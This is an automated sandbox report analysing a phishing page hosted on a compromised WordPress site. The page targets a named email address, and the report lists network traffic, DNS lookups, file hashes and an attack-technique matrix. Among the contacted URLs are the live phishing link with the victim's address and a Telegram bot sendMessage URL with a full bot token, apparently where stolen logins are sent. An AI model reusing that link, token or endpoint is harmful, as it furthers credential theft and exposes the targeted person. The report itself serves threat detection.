              Source: chromecache_65.1.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
              Source: chromecache_65.1.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
              Source: chromecache_65.1.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
              Source: chromecache_65.1.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
              Source: chromecache_65.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
              Source: chromecache_65.1.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
              Source: chromecache_65.1.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
              Source: chromecache_53.1.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6o3ms.woff2
              Source: chromecache_53.1.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.wo
              Source: chromecache_53.1.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.wo
              Source: chromecache_65.1.drString found in binary or memory: https://github.com/eslint/eslint/issues/3229
              Source: chromecache_65.1.drString found in binary or memory: https://github.com/eslint/eslint/issues/6125
              Source: chromecache_65.1.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
              Source: chromecache_65.1.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
              Source: chromecache_65.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
              Source: chromecache_65.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
              Source: chromecache_65.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
              Source: chromecache_65.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
              Source: chromecache_65.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
              Source: chromecache_65.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
              Source: chromecache_65.1.drString found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
              Source: chromecache_57.1.dr, chromecache_64.1.drString found in binary or memory: https://ipinfo.io/missingauth
              Source: chromecache_65.1.drString found in binary or memory: https://jquery.com/
              Source: chromecache_65.1.drString found in binary or memory: https://jquery.org/license
              Source: chromecache_65.1.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
              Source: chromecache_65.1.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
              Source: chromecache_65.1.drString found in binary or memory: https://promisesaplus.com/#point-48
              Source: chromecache_65.1.drString found in binary or memory: https://promisesaplus.com/#point-54
              Source: chromecache_65.1.drString found in binary or memory: https://promisesaplus.com/#point-57
              Source: chromecache_65.1.drString found in binary or memory: https://promisesaplus.com/#point-59
              Source: chromecache_65.1.drString found in binary or memory: https://promisesaplus.com/#point-61
              Source: chromecache_65.1.drString found in binary or memory: https://promisesaplus.com/#point-64
              Source: chromecache_65.1.drString found in binary or memory: https://promisesaplus.com/#point-75
              Source: chromecache_65.1.drString found in binary or memory: https://sizzlejs.com/
              Source: chromecache_63.1.drString found in binary or memory: https://snapbuilder.com
              Source: chromecache_65.1.drString found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
              Source: chromecache_65.1.drString found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a
              Source: unknownNetwork traffic detected: HTTP traffic on port 53996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54016
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54013
              Source: unknownNetwork traffic detected: HTTP traffic on port 54016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54017
              Source: unknownNetwork traffic detected: HTTP traffic on port 53982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53979
              Source: unknownNetwork traffic detected: HTTP traffic on port 53993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53974
              Source: unknownNetwork traffic detected: HTTP traffic on port 53983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53987
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53984
              Source: unknownNetwork traffic detected: HTTP traffic on port 53984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54000
              Source: unknownNetwork traffic detected: HTTP traffic on port 54011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53999
              Source: unknownNetwork traffic detected: HTTP traffic on port 53974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54005
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53993
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54004
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54002
              Source: unknownNetwork traffic detected: HTTP traffic on port 54017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54008
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54007
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54006
              Source: unknownNetwork traffic detected: HTTP traffic on port 54007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54011
              Source: unknownNetwork traffic detected: HTTP traffic on port 54003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53975 -> 443
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7116_1825511031Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7116_1825511031Jump to behavior
              Source: classification engineClassification label: mal92.phis.troj.win@18/37@38/17
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1832,i,3419163324876400064,12375279564585686191,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=2060 /prefetch:11
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.org"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1832,i,3419163324876400064,12375279564585686191,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=2060 /prefetch:11Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
              Ingress Tool Transfer
              Scheduled TransferData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.org100%Avira URL Cloudphishing
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://jsperf.com/thor-indexof-vs-for/50%Avira URL Cloudsafe
              https://snapbuilder.com0%Avira URL Cloudsafe
              https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled0%Avira URL Cloudsafe
              https://bugs.jquery.com/ticket/123590%Avira URL Cloudsafe
              https://bugs.webkit.org/show_bug.cgi?id=1368510%Avira URL Cloudsafe
              https://promisesaplus.com/#point-750%Avira URL Cloudsafe
              https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled0%Avira URL Cloudsafe
              https://drafts.csswg.org/cssom/#common-serializing-idioms0%Avira URL Cloudsafe
              https://html.spec.whatwg.org/#strip-and-collapse-whitespace0%Avira URL Cloudsafe
              https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace0%Avira URL Cloudsafe
              https://bugs.chromium.org/p/chromium/issues/detail?id=3786070%Avira URL Cloudsafe
              https://www.southwark.anglican.org/favicon.ico0%Avira URL Cloudsafe
              https://promisesaplus.com/#point-610%Avira URL Cloudsafe
              https://bugs.chromium.org/p/chromium/issues/detail?id=4702580%Avira URL Cloudsafe
              https://drafts.csswg.org/cssom/#resolved-values0%Avira URL Cloudsafe
              https://promisesaplus.com/#point-640%Avira URL Cloudsafe
              https://bugs.jquery.com/ticket/133780%Avira URL Cloudsafe
              https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html100%Avira URL Cloudphishing
              https://html.spec.whatwg.org/multipage/syntax.html#attributes-20%Avira URL Cloudsafe
              https://promisesaplus.com/#point-590%Avira URL Cloudsafe
              https://jsperf.com/getall-vs-sizzle/20%Avira URL Cloudsafe
              https://promisesaplus.com/#point-540%Avira URL Cloudsafe
              https://promisesaplus.com/#point-570%Avira URL Cloudsafe
              https://promisesaplus.com/#point-480%Avira URL Cloudsafe
              https://html.spec.whatwg.org/multipage/forms.html#category-listed0%Avira URL Cloudsafe
              https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled0%Avira URL Cloudsafe
              https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled0%Avira URL Cloudsafe
              https://bugs.webkit.org/show_bug.cgi?id=1373370%Avira URL Cloudsafe
              https://bugs.chromium.org/p/chromium/issues/detail?id=4498570%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              kit.fontawesome.com.cdn.cloudflare.net
              172.64.147.188
              truefalse
                high
                stackpath.bootstrapcdn.com
                104.18.10.207
                truefalse
                  high
                  kwikkopyegypt.com
                  50.62.201.28
                  truefalse
                    unknown
                    ka-f.fontawesome.com.cdn.cloudflare.net
                    104.21.26.223
                    truefalse
                      high
                      maxcdn.bootstrapcdn.com
                      104.18.11.207
                      truefalse
                        high
                        www.southwark.anglican.org
                        141.193.213.21
                        truefalse
                          high
                          image.thum.io
                          54.156.104.133
                          truefalse
                            high
                            dns.google
                            8.8.4.4
                            truefalse
                              high
                              d26p066pn2w0s0.cloudfront.net
                              13.32.27.129
                              truefalse
                                unknown
                                code.jquery.com
                                151.101.130.137
                                truefalse
                                  high
                                  cdnjs.cloudflare.com
                                  104.17.24.14
                                  truefalse
                                    high
                                    ipinfo.io
                                    34.117.59.81
                                    truefalse
                                      high
                                      www.google.com
                                      172.217.18.4
                                      truefalse
                                        high
                                        api.telegram.org
                                        149.154.167.220
                                        truefalse
                                          high
                                          ka-f.fontawesome.com
                                          unknown
                                          unknownfalse
                                            high
                                            kit.fontawesome.com
                                            unknown
                                            unknownfalse
                                              high
                                              logo.clearbit.com
                                              unknown
                                              unknownfalse
                                                high
                                                NameMaliciousAntivirus DetectionReputation
                                                https://dns.google/resolve?name=southwark.anglican.org&type=MXfalse
                                                  high
                                                  https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                    high
                                                    https://ipinfo.io/jsonfalse
                                                      high
                                                      https://www.southwark.anglican.org/favicon.icofalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.google.com/s2/favicons?domain=?v=BUILD_HASHfalse
                                                        high
                                                        https://image.thum.io/get/width/1200/http://southwark.anglican.orgfalse
                                                          high
                                                          https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.htmltrue
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          https://code.jquery.com/jquery-3.1.1.min.jsfalse
                                                            high
                                                            https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgtrue
                                                              unknown
                                                              https://code.jquery.com/jquery-3.3.1.jsfalse
                                                                high
                                                                https://cdnjs.cloudflare.com/ajax/libs/axios/0.20.0/axios.min.jsfalse
                                                                  high
                                                                  https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                    high
                                                                    https://www.southwark.anglican.org/false
                                                                      unknown
                                                                      https://api.telegram.org/bot7288767743:AAGRVsMLRSfD1NGxN7FxB_HXGEFvLGfPn9w/sendMessagefalse
                                                                        high
                                                                        https://www.google.com/s2/favicons?domain=southwark.anglican.orgfalse
                                                                          high
                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          https://ipinfo.io/missingauthchromecache_57.1.dr, chromecache_64.1.drfalse
                                                                            high
                                                                            https://bugs.webkit.org/show_bug.cgi?id=136851chromecache_65.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://jquery.org/licensechromecache_65.1.drfalse
                                                                              high
                                                                              https://jsperf.com/thor-indexof-vs-for/5chromecache_65.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://bugs.jquery.com/ticket/12359chromecache_65.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://snapbuilder.comchromecache_63.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/chromecache_65.1.drfalse
                                                                                high
                                                                                https://html.spec.whatwg.org/#strip-and-collapse-whitespacechromecache_65.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://promisesaplus.com/#point-75chromecache_65.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-achromecache_65.1.drfalse
                                                                                  high
                                                                                  https://drafts.csswg.org/cssom/#common-serializing-idiomschromecache_65.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabledchromecache_65.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespacechromecache_65.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://github.com/eslint/eslint/issues/6125chromecache_65.1.drfalse
                                                                                    high
                                                                                    https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabledchromecache_65.1.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://bugs.chromium.org/p/chromium/issues/detail?id=378607chromecache_65.1.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://bugzilla.mozilla.org/show_bug.cgi?id=687787chromecache_65.1.drfalse
                                                                                      high
                                                                                      https://bugs.chromium.org/p/chromium/issues/detail?id=470258chromecache_65.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://opensource.org/licenses/MIT).chromecache_67.1.drfalse
                                                                                        high
                                                                                        https://bugs.jquery.com/ticket/13378chromecache_65.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://promisesaplus.com/#point-64chromecache_65.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://promisesaplus.com/#point-61chromecache_65.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://drafts.csswg.org/cssom/#resolved-valueschromecache_65.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://html.spec.whatwg.org/multipage/syntax.html#attributes-2chromecache_65.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://promisesaplus.com/#point-59chromecache_65.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://jsperf.com/getall-vs-sizzle/2chromecache_65.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://promisesaplus.com/#point-57chromecache_65.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://github.com/eslint/eslint/issues/3229chromecache_65.1.drfalse
                                                                                          high
                                                                                          https://promisesaplus.com/#point-54chromecache_65.1.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://html.spec.whatwg.org/multipage/forms.html#category-listedchromecache_65.1.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://html.spec.whatwg.org/multipage/scripting.html#selector-disabledchromecache_65.1.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://developer.mozilla.org/en-US/docs/CSS/displaychromecache_65.1.drfalse
                                                                                            high
                                                                                            https://jquery.org/licensechromecache_65.1.drfalse
                                                                                              high
                                                                                              https://jquery.com/chromecache_65.1.drfalse
                                                                                                high
                                                                                                https://bugs.webkit.org/show_bug.cgi?id=137337chromecache_65.1.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://html.spec.whatwg.org/multipage/scripting.html#selector-enabledchromecache_65.1.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://promisesaplus.com/#point-48chromecache_65.1.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://github.com/jquery/sizzle/pull/225chromecache_65.1.drfalse
                                                                                                  high
                                                                                                  https://sizzlejs.com/chromecache_65.1.drfalse
                                                                                                    high
                                                                                                    https://bugs.chromium.org/p/chromium/issues/detail?id=449857chromecache_65.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    172.64.147.188
                                                                                                    kit.fontawesome.com.cdn.cloudflare.netUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    104.18.10.207
                                                                                                    stackpath.bootstrapcdn.comUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    8.8.4.4
                                                                                                    dns.googleUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    151.101.130.137
                                                                                                    code.jquery.comUnited States
                                                                                                    54113FASTLYUSfalse
                                                                                                    8.8.8.8
                                                                                                    unknownUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    141.193.213.21
                                                                                                    www.southwark.anglican.orgUnited States
                                                                                                    396845DV-PRIMARY-ASN1USfalse
                                                                                                    149.154.167.220
                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                    62041TELEGRAMRUfalse
                                                                                                    142.250.186.132
                                                                                                    unknownUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    13.32.27.129
                                                                                                    d26p066pn2w0s0.cloudfront.netUnited States
                                                                                                    7018ATT-INTERNET4USfalse
                                                                                                    104.21.26.223
                                                                                                    ka-f.fontawesome.com.cdn.cloudflare.netUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    104.17.24.14
                                                                                                    cdnjs.cloudflare.comUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    34.117.59.81
                                                                                                    ipinfo.ioUnited States
                                                                                                    139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                    172.217.18.4
                                                                                                    www.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    54.156.104.133
                                                                                                    image.thum.ioUnited States
                                                                                                    14618AMAZON-AESUSfalse
                                                                                                    104.18.11.207
                                                                                                    maxcdn.bootstrapcdn.comUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    50.62.201.28
                                                                                                    kwikkopyegypt.comUnited States
                                                                                                    26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                                                    IP
                                                                                                    192.168.2.24
                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                    Analysis ID:1633668
                                                                                                    Start date and time:2025-03-10 13:49:24 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 3m 32s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:browseurl.jbs
                                                                                                    Sample URL:https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.org
                                                                                                    Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                                                                                    Number of analysed new started processes analysed:10
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Detection:MAL
                                                                                                    Classification:mal92.phis.troj.win@18/37@38/17
                                                                                                    • Exclude process from analysis (whitelisted): SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 142.250.181.227, 142.250.185.78, 142.250.186.110, 74.125.71.84, 142.250.185.206, 142.250.184.206, 172.217.16.206, 216.58.212.142, 142.250.74.206, 142.250.186.74, 142.250.185.99, 142.250.185.106, 142.250.184.234, 142.250.185.138, 142.250.185.170, 172.217.23.106, 142.250.185.74, 142.250.186.138, 172.217.18.10, 142.250.186.106, 142.250.185.234, 172.217.16.138, 216.58.206.74, 142.250.184.202, 142.250.186.170, 142.250.185.202, 199.232.210.172, 172.217.23.110, 216.58.212.174, 142.250.184.238, 172.217.16.202, 216.58.206.42, 142.250.186.42, 142.250.181.234, 172.217.16.142, 142.250.185.110, 142.250.185.195, 142.250.186.174, 142.250.185.174, 199.232.214.172, 4.245.163.56
                                                                                                    • Excluded domains from analysis (whitelisted): fonts.googleapis.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.org
                                                                                                    No simulations
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):9
                                                                                                    Entropy (8bit):2.94770277922009
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:mn:mn
                                                                                                    MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                    SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                    SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                    SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://kit.fontawesome.com/585b051251.js
                                                                                                    Preview:Forbidden
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:data
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):13529
